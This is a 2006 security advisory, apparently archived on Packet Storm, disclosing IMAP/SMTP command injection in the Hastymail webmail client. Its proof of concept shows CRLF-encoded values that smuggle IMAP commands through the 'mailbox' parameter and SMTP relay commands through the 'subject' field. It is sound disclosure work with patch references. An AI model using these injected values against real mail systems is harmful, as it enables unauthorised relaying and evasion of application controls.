exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ISAA-2006-011.txt

ISAA-2006-011.txt
Posted Dec 6, 2006
Authored by Vicente Aguilera Diaz

Improper command and information validation transmitted by Hastymail to the mail servers during the normal use of this application facilitates that an authenticated malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail across parameters used by the webmail front-end in its communication with these mail servers. This vulnerability has been found in development version 1.5 and stable version 1.0.2.

tags | exploit, arbitrary, imap
SHA-256 | a3e1f1a44710237610d3100801340ec499b4ad76630080fc5ed1b6ef649d4782

ISAA-2006-011.txt

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2006-011
- Original release date: September 28, 2006
- Last revised: December 1, 2006
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
IMAP/SMTP Injection in Hastymail.

II. BACKGROUND
-------------------------
Hastymail is yet another webmail IMAP client written in PHP. Hastymail
is designed for speed, RFC compatibility, simplicity, and security.
Our goal is to create a simple interface with powerful but easy to use
options that make managing your IMAP account effective and fast.

Hastymail is NOT groupware. We are focused on being a functional and
fast webmail client.

The product homepage is http://hastymail.sourceforge.net/

III. DESCRIPTION
-------------------------
Hastymail provides a graphical interface to interact with mail servers
across the IMAP/SMTP protocols.

Improper command and information validation transmitted by Hastymail
to the mail servers during the normal use of this application (for
example, acceding to the mailbox) facilitates that an authenticate
malicious user could inject arbitrary IMAP/SMTP commands into the mail
servers used by Hastymail across parameters used by the webmail
front-end in its communication with these mail servers.

This is become dangerous because the injection of these commands
allows an intruder to evade restrictions imposed at application level,
and exploit vulnerabilities that could exist in the mail servers
through IMAP/SMTP commands.

IV. PROOF OF CONCEPT
-------------------------
== IMAP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "mailbox" (and possibly others)

When a user access to a folder (for example, "INBOX"), he creates a
GET request as:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX

A malicious user can modify the value of the "mailbox" parameter and
inject any IMAP command.
The IMAP command injection has the following structure:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX
To observe that there has been in use double URL encoding for
codifying the quote character (").

Example:
Injection of the CREATE IMAP command across the "mailbox" parameter:
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad

== SMTP Injection example (1.5 version) =============
Hastymail Vulnerable parameter: "subject" (and possibly others)

When a user send a message, he create a POST request like:
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and
inject any SMTP command.
Example: Relay from a non-existent e-mail address

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.

-----------------------------84060780712450133071594948441
...

V. BUSINESS IMPACT
-------------------------
The IMAP/SMTP command injection allow to exploit vulnerabilities in
the IMAP/SMTP servers and evade all the restrictions at the
application layer.

VI. SYSTEMS AFFECTED
-------------------------
This vulnerability has been tested in:
- Last development version: 1.5, released on February 17, 2006
- Last stable version: 1.0.2, August 23, 2004

Possibly all versions are affected by this vulnerability.

VII. SOLUTION
-------------------------
Apply the patch: http://hastymail.sourceforge.net/security.php

VIII. REFERENCES
-------------------------
http://hastymail.sourceforge.net/security.php

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).

X. REVISION HISTORY
-------------------------
September 28, 2006: Initial release
October 3, 2006: Project admin response
October 9, 2006: Project admin publish the patch for 1.5 and 1.02
versions.

XI. DISCLOSURE TIMELINE
-------------------------
September 28, 2006: Vulnerability acquired by Vicente Aguilera Diaz
Internet Security Auditors (www.isecauditors.com)
December 1, 2006: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close